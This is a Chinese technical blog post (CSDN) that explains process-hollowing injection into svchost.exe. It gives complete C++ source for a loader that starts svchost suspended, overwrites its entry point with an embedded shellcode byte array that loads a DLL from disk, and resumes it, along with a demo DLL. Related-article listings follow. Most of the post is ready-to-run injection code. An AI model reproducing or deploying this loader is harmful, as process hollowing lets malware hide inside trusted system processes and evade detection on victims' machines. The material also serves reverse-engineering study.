创建傀儡进程svchost.exe并注入DLL文件(Shellcode)

已于 2024-01-14 12:01:53 修改
阅读量708 收藏 1
点赞数 1
分类专栏: 进程注入 文章标签: c++ 系统安全
于 2023-08-13 12:20:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39190622/article/details/132258088
版权

 

本文主要利用 SetThreadContext 修改进程中的线程上下文来实现Dll注入(ShellCode)。

实现原理

  • 首先,使用 CreateProcess 函数创建svchost.exe进程,并且设置创建进程的标志为 CREATE_SUSPENDED,即表示新进程的主线程被挂起。 
  • 使用 GetThreadContext,设置标志为 CONTEXT_ALL,获取新进程中所有的线程上下文。
  • 使用 ReadProcessMemory 读取目标进程的加载基址。
  • 在原来的空间中进行覆盖写入 Shellcode。
  • 最后,调用 ResumeThread 恢复主线程,让进程继续运行并执行我们的 Shellcode 代码。

EXE主程序:  

int main()
{
	//Dll inject shellcode, path D:\x86.dll
	unsigned char buf[] =
	"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50"
	"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"
	"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7"
	"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78"
	"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3"
	"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01"
	"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58"
	"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3"
	"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a"
	"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x8d\x85\xb0"
	"\x00\x00\x00\x50\x68\x4c\x77\x26\x07\xff\xd5\xbb\xf0\xb5"
	"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80"
	"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
	"\x44\x3a\x5c\x78\x38\x36\x2e\x64\x6c\x6c\x00";

	STARTUPINFOA si;
	PROCESS_INFORMATION pi;
	ZeroMemory(&si, sizeof(si));
	ZeroMemory(&pi, sizeof(pi));
	si.cb = sizeof(STARTUPINFOA);
	// 创建挂起进程
	if (!CreateProcessA(
		"C:\\windows\\sysWoW64\\svchost.exe",
		NULL,
		NULL,
		NULL,
		FALSE,
		CREATE_SUSPENDED,
		NULL,
		NULL,
		&si,
		&pi
	))
	{
		printf("CreateProcess failed (%d).\n", GetLastError());
		return 0;
	}

	// 获取线程上下文
	CONTEXT ctx = { 0 };
	ctx.ContextFlags = CONTEXT_ALL;
	if (!GetThreadContext(pi.hThread, &ctx))
	{
		printf("GetThreadContext failed (%d).\n", GetLastError());
	}

	// 拿到目标进程主线程上下文后,在Ebx寄存器中保存的就是PEB的地址,
	// 而PEB结构偏移0x8的位置是AddressOfImageBase字段,
	// 所以直接来读取ctx.Ebx+0x8,就可以获取到目标进程的加载基址
	DWORD dwImageBase = 0;
	DWORD lpNumberOfBytesRead = 0;
	if (!ReadProcessMemory(pi.hProcess, (LPCVOID)(ctx.Ebx + 0x8), &dwImageBase, sizeof(DWORD), &lpNumberOfBytesRead))
	{
		printf("ReadProcessMemory failed (%d).\n", GetLastError());
		return 0;
	}

	// 在申请的空间中写入shellcode
	DWORD NumberOfBytesWritten = 0;
	if (!WriteProcessMemory(pi.hProcess, (LPVOID)ctx.Eax, buf, sizeof(buf), &NumberOfBytesWritten))
	{
		printf("WriteProcessMemory failed (%d).\n", GetLastError());
	}

	// 恢复线程执行
	if (ResumeThread(pi.hThread) == -1)
	{
		printf("ResumeThread failed (%d).\n", GetLastError());
	}

	system("pause");

    return 0;
}

 DLL程序:

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
					 )
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		MessageBox(NULL, "DLL inject successful!", "Successful", NULL);
		break;
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

 效果演示:

Rainbow Technology
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
傀儡进程注入
qq_40710190的博客
05-08 953
傀儡进程注入 这个注入之所以叫傀儡进程注入是因为其做法是先创建一个A进程,然后将其内存替换成要执行的代码,而从外部来看就是最初创建的A进程。 从我的视角来看跟PE文件注入还蛮像的,不同点在于PE文件注入是将代码注入进去后修改EntryPoint引导至注入的代码,而傀儡进程注入则更加简单暴力一些😋,把所有内存替换了。 多亏了之前的一些PE基础因此没有特别费劲PE文件头格式解析 本章详细讲解m0n0ph1的源码 创建傀儡进程 根据一开始所说,我们需要创建一个进程 printf("Creating process
dll注入系列——傀儡进程
40KO的博客
04-11 990
0x0介绍 之前说过,要动态注入dll文件,则需要执行程序中本身没有的加载操作,必须改变控制流,除了创建线程外,还可以劫持控制流。这与二进制漏洞利用比较类似,我们向程序写入一段shellcode,然后改变线程上下文,让其去执行shellcode,这段shellcode完成LoadLibrary的操作,就完成了dll注入傀儡进程的本质是利用其他进程空间来执行我们的写入代码,它的实现并不困难...
傀儡进程技术分析
darcy_123的博客
10-13 1009
前言: 傀儡进程是将目标进程的映射文件替换为指定的映射文件,替换后的进程称之为傀儡进程;常常有恶意程序将隐藏在自己文件内的恶意代码加载进目标进程,而在加载进目标进程之前,会利用ZwUnmpViewOfSection或者NtUnmapViewOfSection进行相关设置 相关技术要点 1.创建挂起进程 系统函数CreateProcessW中参数dwCreation传递CREATE_SUSP...
windows黑客编程技术之隐藏技术(进程伪装,傀儡进程进程隐藏)
weixin_44891742的博客
07-26 6080
windows黑客编程技术之隐藏技术(进程伪装,傀儡进程进程隐藏)
滴水逆向三期 win10 ASLR UnmapViewOfSection傀儡进程 加密壳项目
四位的博客
12-27 2008
特意加了一个win10标题, 碰到0xc0000005的朋友就不要再浪费时间了, 我在这个问题上花了整整一天 概要 利用挂起创建进程, 然后卸载源程序(以下统称src)镜像(ps: 非必须选项),
傀儡进程
苞米地里捉小鸡的博客
10-13 622
背景 傀儡进程本质上是借用正常的软件进程或是系统进程的外壳来执行非正常的恶意操作。 函数介绍 1.GetThreadContext 获取指定线程的上下文 2.SetThreadContext 设置指定线程的上下文 3.ResumeThread 减少线程的暂停计数。当暂停计数递减到零时,恢复线程的执行 实现原理 (1)第一步 利用CreateProcess创建进程并且使用CREATE_SUSPENDED标志挂起主线程 bRet = ::CreateProcess(pszFilePat
【软件逆向】如何在windows下远程注入dll并进行虚表hook
最新发布
zhangjiuding的博客
10-23 1657
如何在windows下远程注入dll并进行虚表hook
DLL打包在EXE文件中的两种方法
郝伟老师的博客——大数据、并行计算与人工智能时代
10-11 8544
需求描述 在C#的项目中,经常会引用一些外部的DLL库。在发布的时候,必需将这些库和可执行程序一起发布,否则会导致程序无法运行。在一些项目中,会有这样的需求:希望发布一个单独的可执行文件,将所引用的DLL文件打包入EXE程序中的方式来实现。 实现原理 想要实现这个库有以下三种方式: 以嵌入的资源将DLL文件打包,然后在运行的时候再释放出来; 以嵌入的资源将DLL文件打包,然后在运行时直接加载至内...
易语言-可被Svchost.exe启动的DLL服务源码 支持32/64位全系统
06-25
大家都知道,windows系统下有多个svchost.exe进程,它是从动态链接库 (DLL) 中运行的服务的通用主机进程名称。 本源码是一个完整的可被svchost.exe启动的DLL服务源码,同时包含了穿透Session0隔离来与桌面交互的源码...
服务Dll注入Svchost进程
08-31
2、注入svchost进程 3、服务打开计算器(涉及到session,知识点) 4、线程输出时间debugview中查看 程序安装完服务,服务启动有以下方式: 1、重启电脑,使用电脑自带svhost服务组自启动服务; 2、手动执行脚本...
进程隐藏,
02-23
远程线程注入,例子中是注入到“CALC.EXE”你可改成任何其他的进程
一个可以由SVCHost.exe服务调用的dll模块
02-23
替换由svchost.exe启动的某个系统服务,具体服务由全局变量 ServiceName 决定.
shellcode帮助工具,直接把exeshellcode
12-29
Shellcode Helper v1.62 Coded by TeLeMan (c) 2008-2013 Usage: schelper.exe [options] Options: -i [input file] input file (Default: stdin) -o [output file] output file (Default: stdout) -s input file format (Default: Auto-Detection) -sb input file format is Binary -sp the input file format's parameters -d output file format (Default: C format) -db output file format is Binary -dp the output file format's parameters -search get the start offset by the pattern: e.g. PK\x03\x04 -soff fix the match offset after searching (Default: 0) -off convert the input file from the offset (Default: 0) -len convert the input file with the length (Default: 0 - MAX) -en [encoder] encode shellcode (Default: XorDword) -de [encoder] decode shellcode (Default: Auto-Detection) -ex exclude characters: e.g. 0x00,0x01-0x1F,0xFF (Default: 0x00) -in incude characters only -ep the encoder's parameters -t [pid] execute or inject shellcode into process for testing -td [pid] execute or inject shellcode into process for debugging -stack put shellcode into stack and execute it (ESP is the shellcode start) -noinfo display no normal messages except error messages Available formats: 0 - C 1 - C(HexArray) 2 - Perl 3 - Python 4 - Ruby 5 - JavaScript(Escape) 6 - VBScript(Escape) 7 - Pascal 8 - MASM(Data) 9 - HexDump 10 - BitString 11 - HexString 12 - HexArray(C like) 13 - Base64 14 - Binary 15 - HexString(C like) 16 - HexString(Escape) 17 - HexString(JavaScript,UNICODE) 18 - URI(ISO-8859-1) 19 - XML(PCDATA) 20 - BigNumber 21 - BigNumber(Hex) 22 - BigNumber(BaseX) 23 - FloatPoint 24 - UnixTimestamp 25 - GUID 26 - MASM(ASM) 27 - NASM 28 - YASM(ASM) 29 - FASM(ASM) 30 - JWASM(ASM) 31 - POASM(ASM) 32 - GOASM(ASM) 33 - GNU ASM Available encoders:
svchost.exe应用程序错误崩溃 原因查看和解决
01-22
3. **系统文件损坏**:系统关键文件svchost.exe或它所依赖的动态链接库(DLL文件被意外删除或损坏。 4. **驱动程序问题**:不兼容或损坏的设备驱动可能会导致svchost.exe崩溃。 5. **服务配置错误**:服务配置...
联想工程师专用小工具 开机提示svchost.exe应用程序错误修复工具V2.30.1
05-30
联想工程师专用小工具 开机提示svchost.exe应用程序错误修复工具V2.30.1联想工程师专用小工具 开机提示svchost.exe应用程序错误修复工具V2.30.1联想工程师专用小工具 开机提示svchost.exe应用程序错误修复工具V...
可被Svchost.exe启动的DLL服务源码-易语言
06-12
大家都知道,windows系统下有多个svchost.exe进程,它是从动态链接库 (DLL) 中运行的服务的通用主机进程名称。 本源码是一个完整的可被svchost.exe启动的DLL服务源码,同时包含了穿透Session0隔离来与桌面交互的源码...
滴水逆向----代码区添加shellcode
clayoa的博客
01-09 738
上次海哥讲到FileBuffer------>ImageBuffer,这次我们需要在代码区添加代码 我们这次要添加的代码功能:双击exe,先跳出MessageBox,然后软件正常使用 需要的知识点: 1.我们添加的代码不是c,不是汇编,而是二进制,因为exe都是二进制组成的,我们要知道一些汇编的硬编码,call的硬编码是E8,jmp的硬编码是E9 2.知道了call的硬编码,那么后面的地址是直接用编译器打开的地址吗?不是的,地址是经过转换得到的,公式:真正要跳转的地址=E8下一条指令的地址+X
隐藏技术
u010704579的博客
02-09 510
隐藏技术 4种隐藏、伪装技术: 进程伪装:通过修改指定进程PEB中的路径和命令行信息实现伪装。 傀儡进程:通过进程挂起,替换内存数据再恢复执行,从而实现创建傀儡进程进程隐藏:通过HOOK函数 ZwQuerySystemInformation 实现进程隐藏。 DLL劫持 :通过 #pragma comment指令直接转发DLL导出函数或者通过LoadLibrary和GetProcA...
使用命令 Get-Process svchost.exe 提示:找不到名为“svchost.exe”的进程
05-20
这个问题可能是由于权限不足导致的。请使用管理员身份运行 PowerShell,并再次尝试使用该命令。 如果问题仍然存在,可能是因为 svchost.exe 进程被隐藏了。你可以尝试使用任务管理器或其他进程管理工具查看是否存在 svchost.exe 进程。如果仍然找不到,请运行杀毒软件扫描计算机以查找可能存在的恶意软件。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Rainbow Technology

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值